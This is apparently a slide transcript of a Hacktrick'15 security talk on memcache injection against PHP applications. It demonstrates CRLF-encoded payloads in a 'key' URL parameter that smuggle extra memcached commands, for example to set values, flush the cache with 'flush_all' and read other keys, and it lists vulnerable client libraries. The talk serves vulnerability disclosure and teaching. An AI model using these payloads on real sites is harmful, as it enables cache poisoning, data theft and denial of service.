memcache injection (hacktrick'15)
TRANSCRIPT
Memcache Injection Ömer Çıtak – Hacktrick’15
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak
#! whoami
#! memcached.jpg
#! cat using_memcached
#! phpstorm memcached.php
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END
#! telnet 127.0.0.1 11211
memcached.php?key=
#! phpstorm memcached.php
#! phpstorm memcached.php
memcached.php?key=omer
#! phpstorm memcached.php
?key=omer+0+3600+6+\r\n+hacked+\r\n
?key=omer 0 10 6 \r\n hacked \r\n
urlencode(‘\r’) = %0d
urlencode(‘\n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
#! telnet 127.0.0.1 11211
> set omer 0 3600 6
> hacked
< STORED
> 123456
< ERROR
?key=aaaaa…(251)
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251)
flush_all %0d%0a
#! phpstorm memcached.php
#! phpstorm memcached.php
?key=omer
#! phpstorm memcached.php
> get key_omer
< VALUE key_omer 0 6
< 123456
< END
#! phpstorm memcached.php
?key=aaa (251) %0d%0a get omer 0 6
#! phpstorm memcached.php
> get aaa (251)
< ERROR
< get omer
< VALUE omer 0 6
< 353535
< END
#! phpstorm memcached.php
Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached
#! cat vulnerable_libraries
Python : python-memcache
Php : memcache
Java : java.net.spy.memcached
#! cat safe_libraries
• Wordpress
• Joomla 3.2.2
• Piwik 2.1.0
• MODX Revolution 2.3
#! cat using_memcached
fixed?
fixed?
#! questions?
Thanks <3
www.omercitak.com
Social : @Om3rCitak
#! exit